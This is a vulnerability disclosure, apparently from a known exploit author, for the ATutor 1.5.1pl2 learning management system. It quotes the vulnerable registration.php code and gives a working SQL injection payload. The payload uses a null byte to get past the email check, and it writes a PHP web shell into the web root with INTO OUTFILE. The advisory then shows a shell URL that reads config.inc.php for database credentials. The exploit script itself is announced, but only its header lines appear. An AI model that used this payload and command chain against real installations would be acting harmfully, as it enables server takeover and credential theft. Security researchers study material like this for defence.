ATutor 1.5.1pl2 SQL Injection / Remote commands execution software: site: http://www.atutor.ca/ description : "ATutor is an Open Source Web-based Learning Content Management System (LCMS) designed with accessibility and adaptability in mind." if magic_quotes_gpc off -> SQL INJECTION vulnerable code in registration.php at lines 26-34: ... if ($_POST['email'] == '') { $msg->addError('EMAIL_MISSING'); } else if (!eregi("^[a-z0-9\._-]+@+[a-z0-9\._-]+\.+[a-z]{2,6}$", $_POST['email'])) { $msg->addError('EMAIL_INVALID'); } $result = mysql_query("SELECT * FROM ".TABLE_PREFIX."members WHERE email LIKE '$_POST[email]'",$db); if (mysql_num_rows($result) != 0) { $msg->addError('EMAIL_EXISTS'); } ... you can bypass regex check and inject SQL statements appending a null char (%00) to a valid email address, ex: FAKE@FAKEMAIL.FKE[null char]'UNION SELECT 0,0,0,0,'',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE "../../www/shell.php" FROM at_members/* now in shell.php we have: then you can launch commands: http://[target]/[path]/shell.php?cmd=cat%20./include/config.inc.php (look inside html for database username & password...) this is my proof of concept exploit:
ATutor 1.5.1pl2 (possibly prior versions) remote commands xcution
a script by rgod at http://rgod.altervista.org